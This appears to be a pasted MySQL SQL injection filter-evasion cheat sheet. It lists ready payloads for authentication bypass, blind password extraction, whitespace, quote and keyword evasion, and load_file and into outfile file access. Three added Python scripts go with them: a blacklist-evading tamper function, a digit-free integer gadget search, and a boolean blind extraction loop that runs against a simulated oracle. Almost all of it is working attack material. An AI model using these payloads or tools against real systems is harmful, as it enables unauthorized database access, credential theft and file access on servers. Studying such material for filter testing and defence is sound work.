moemyintshein

SQLi Filter evasion cheat sheet

Mar 15th, 2017
SQLi Filter evasion cheat sheet (MySQL)

Basic filter

Comments
' or 1=1#
' or 1=1-- - (MySQL requires whitespace after --; the extra - keeps a trailing space from being trimmed away)
' or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select 1,2 as ` (the unterminated backtick swallows the rest of the query)
' or#newline
1='1
' or-- -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1

Prefixes
+ - ~ !
' or --+2=- -!!!'2

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/ (%a0 counts as whitespace only in some connection character sets, e.g. latin1)
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users

Typecasting
' or true = '1 # or 1=1
' or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1 (only on a 5.1 server: version() is a string and is cast to its leading number in arithmetic)
' or '1 # or true

Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users


Authentication bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0 (any non-numeric name is cast to 0 for the comparison)
select * from users where true
select * from users

Function filter

General function filtering
ascii (97) (whitespace before the parenthesis works for most built-in functions; for the reserved ones such as count or substr it needs sql_mode IGNORE_SPACE)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
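The rewrites from the Comments, Whitespaces, Strings without quotes and Strings with functions sections above, combined into a sqlmap-style tamper function. This is an added example, not code from the original cheat sheet: the blocked-keyword list, the separator and the sample payload are constructed for illustration, and the payload handed in is expected to be the part after the break-out quote, with its own string literals balanced.

```python
import re

# Added example, not from the original cheat sheet: applies three of the
# evasions listed above to one payload:
#   1. single-quoted literals -> quote-free 0x... or char(...) literals
#   2. blocked keywords       -> MySQL versioned comments, /*!50000union*/
#   3. whitespace             -> an alternative separator, /**/ by default
# DEFAULT_BLOCKED and the payload in __main__ are constructed for illustration.


def quoteless_literal(text, mode="hex"):
    """Rewrite a string value without quotes, as in 'abc' = 0x616263 or
    'abc' = char(97,98,99).  MySQL reads 0x... as a binary string literal."""
    data = text.encode("utf-8")
    if not data:
        return "''"  # there is no quote-free spelling of the empty string
    if mode == "hex":
        return "0x" + data.hex()
    if mode == "char":
        return "char(%s)" % ",".join(str(b) for b in data)
    raise ValueError("unknown mode %r" % mode)


def strip_quotes(payload, mode="hex"):
    """Replace every balanced '...' literal in the payload."""
    return re.sub(r"'([^']*)'", lambda m: quoteless_literal(m.group(1), mode), payload)


def wrap_keywords(payload, keywords, version="50000"):
    """Hide blocked keywords in versioned comments: MySQL executes the body
    when its version is >= the five-digit number, everything else sees a
    comment.  \\b keeps 'or' inside identifiers such as 'password' untouched."""
    pattern = re.compile(r"\b(%s)\b" % "|".join(map(re.escape, keywords)), re.IGNORECASE)
    return pattern.sub(lambda m: "/*!%s%s*/" % (version, m.group(1)), payload)


def replace_whitespace(payload, separator="/**/"):
    """Swap every run of whitespace for a separator the parser still accepts
    (/**/, %09, %0a, ...; %a0 only under some character sets)."""
    return re.sub(r"\s+", separator, payload)


DEFAULT_BLOCKED = ("union", "select", "from", "where", "and", "or")


def tamper(payload, blocked=DEFAULT_BLOCKED, separator="/**/", literal_mode="hex"):
    """Apply the rewrites in the order that keeps them from colliding:
    literals first, so a keyword inside a string value is never wrapped,
    whitespace last, so nothing introduced earlier is broken apart."""
    payload = strip_quotes(payload, literal_mode)
    payload = wrap_keywords(payload, blocked)
    return replace_whitespace(payload, separator)


if __name__ == "__main__":
    # constructed payload: the text that follows the application's quote
    print("'" + tamper(" union select pass from users where name = 'admin'") + "#")
```

After `tamper()` the payload contains no quote, no bare whitespace and no bare blocked keyword, which is what a naive blacklist matches on; MySQL still parses it as the original statement. The separator is a parameter because whether `%a0` is whitespace depends on the connection character set, while `/**/` is accepted everywhere.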

Strings extracted from gadgets (results depend on server version, character set and configuration)
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{?"^c×HéÉEa (raw ciphertext bytes, shown as rendered)
des_encrypt(1,2) // ‚GÒ/ïÖk
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer representations (entries built on version() assume a 5.1 server, where version() casts to 5.1; on MySQL 8.0 floor(version()) is 8 and those entries shift)
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36

@@new: 0
@@log_bin: 1

!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4

minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
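Generalising the table above: a small search that produces a digit-free expression for a wanted integer on a given server version, since every entry built on version() is tied to a 5.1 server. This is an added example, not part of the original cheat sheet. It models only what the table relies on (pi() as a double, version() cast to its leading number in arithmetic, true/false as 1/0, floor, ceil and + - *); the version strings are constructed samples, and the built-in check evaluates only expressions made of those tokens.

```python
import itertools
import math
import re

# Added example, not from the original cheat sheet.  Models the MySQL
# behaviour the gadget table depends on: PI() is a double, VERSION() is a
# string whose leading numeric prefix is used in arithmetic
# ('5.1.73-log' -> 5.1, '8.0.36' -> 8.0), true is 1 and false is 0.
# The version strings used below are constructed sample values.

ATOMS = {
    "pi()": lambda v: math.pi,
    "version()": lambda v: v,
    "true": lambda v: 1.0,
    "false": lambda v: 0.0,
}


def version_number(version_string):
    """Leading numeric prefix of VERSION(), as MySQL coerces it to a number."""
    m = re.match(r"\d+(?:\.\d+)?", version_string)
    return float(m.group(0)) if m else 0.0


def mysql_value(expr, version_string):
    """Evaluate an expression made only of the gadget tokens (pi(), version(),
    true, false, floor, ceil, + - * and parentheses).  The token check also
    rejects any digit, so it doubles as the digit-free test."""
    if not re.fullmatch(r"[a-z()+\-*]+", expr):
        raise ValueError("unexpected token in %r" % expr)
    py = (expr.replace("floor(", "math.floor(")
              .replace("ceil(", "math.ceil(")
              .replace("pi()", "math.pi")
              .replace("version()", repr(version_number(version_string)))
              .replace("true", "1")
              .replace("false", "0"))
    return eval(py, {"math": math, "__builtins__": {}})


def find_integer_gadget(n, version_string="5.1.73-log", rounds=3):
    """Breadth-first search for a digit-free expression equal to integer n on
    the given server.  Each round applies floor/ceil to everything known, then
    combines known values pairwise with + - *.  Returns None if nothing is
    found within `rounds` rounds."""
    v = version_number(version_string)
    bound = abs(n) + 10                   # prune intermediate values
    found = {}                            # rounded value -> shortest expression

    def remember(val, text):
        if abs(val) > bound:
            return
        key = round(float(val), 9)
        if key not in found or len(text) < len(found[key]):
            found[key] = text

    for text, fn in ATOMS.items():
        remember(fn(v), text)
    target = round(float(n), 9)
    for _ in range(rounds):
        snapshot = list(found.items())
        for val, text in snapshot:
            remember(math.floor(val), "floor(%s)" % text)
            remember(math.ceil(val), "ceil(%s)" % text)
        if target in found:
            break
        for (a, ta), (b, tb) in itertools.product(snapshot, repeat=2):
            remember(a + b, "(%s+%s)" % (ta, tb))
            remember(a - b, "(%s-%s)" % (ta, tb))
            remember(a * b, "(%s*%s)" % (ta, tb))
    return found.get(target)


if __name__ == "__main__":
    for version in ("5.1.73-log", "8.0.36"):
        for n in (5, 13, 23):
            gadget = find_integer_gadget(n, version)
            print(version, n, gadget, mysql_value(gadget, version))
```

Run against both constructed versions the output shows why the table needs a caveat: on 5.1 the gadget for 5 is floor(version()), on 8.0 that same expression evaluates to 8 and the search picks a different one. Parentheses around every binary step make the emitted text safe to paste regardless of operator precedence, at the cost of a few extra characters.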

Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version()from(version()))

Search substrings
locate('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc', 'a', ''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))

String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a','k') != aes_encrypt('A','k')
des_encrypt('a') != des_encrypt('A')
(under a case-insensitive collation 'a' = 'A' is true, so a hash or cipher of the value is compared instead; password(), old_password() and des_encrypt() no longer exist in MySQL 8.0)

Keyword filter
(each heading below lists the keywords assumed to be blocked, cumulatively; where a payload still writes "and", use the && form from the OR, AND entry)

Connected keyword filtering
(0)union(select(table_name),column_name,...
0/**/union/*!50000select*/table_name`foo`/**/...
0%a0union%a0select%09group_concat(table_name)....
0'union all select all`table_name`foo from`information_schema`. `tables`

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id having id = 1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a
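The max(pass) probe above, driven as a boolean-based blind extraction loop. This is an added example, not part of the original cheat sheet: the oracle that would send the request and read the application's true/false response is replaced by a constructed simulation of the vulnerable query over constructed sample rows, so the script runs offline.

```python
import re
import string

# Added example, not from the original cheat sheet: recovers max(pass) one
# character at a time with the page's probe
#   ' and substr((select max(pass) from users),N,1)='c
# which needs none of WHERE, LIMIT, UNION or OR.  SIMULATED_USERS and
# simulated_oracle() are constructed stand-ins for the target application.

CHARSET = string.ascii_lowercase + string.digits

SIMULATED_USERS = [("admin", "s3cret"), ("bob", "hunter2")]   # constructed rows


def probe(position, char, column="pass", table="users"):
    """One boolean question: is character `position` of max(column) == char?
    The leading quote closes the application's own string literal."""
    return "' and substr((select max(%s) from %s),%d,1)='%s" % (column, table, position, char)


def simulated_oracle(payload):
    """Stand-in for the HTTP round trip.  Understands only the probe shape
    above and answers the way MySQL would for SIMULATED_USERS: substr() past
    the end of the value yields '' (never equal to a character) and the
    default case-insensitive collation makes 'a' = 'A' true."""
    m = re.fullmatch(r"' and substr\(\(select max\(pass\) from users\),(\d+),1\)='(.)", payload)
    if m is None:
        raise ValueError("unsupported payload: %r" % payload)
    position, char = int(m.group(1)), m.group(2)
    max_pass = max(pw for _, pw in SIMULATED_USERS)   # max(pass) -> 's3cret'
    return max_pass[position - 1:position].lower() == char.lower()


def extract(oracle, charset=CHARSET, max_len=32, column="pass", table="users"):
    """Recover max(column) character by character.  Stops at the first
    position where nothing in charset matches: the end of the value, or a
    character outside charset (widen CHARSET if that is suspected)."""
    value = ""
    for position in range(1, max_len + 1):
        for char in charset:
            if oracle(probe(position, char, column, table)):
                value += char
                break
        else:
            break
    return value


if __name__ == "__main__":
    print(extract(simulated_oracle))   # s3cret
```

Comparing with `=` against a charset costs one request per candidate character, so len(value) times len(charset) in the worst case; asking `ascii(substr(...)) > N` instead halves the candidate range per request and fits the same loop. Because the collation is case-insensitive, what comes back is the value with case folded, which is why the String case section above compares hashes of the value when case matters.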

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
'='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
' procedure analyse()# (PROCEDURE ANALYSE() was removed in MySQL 8.0)
'-if(name='Admin',1,0)#
'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)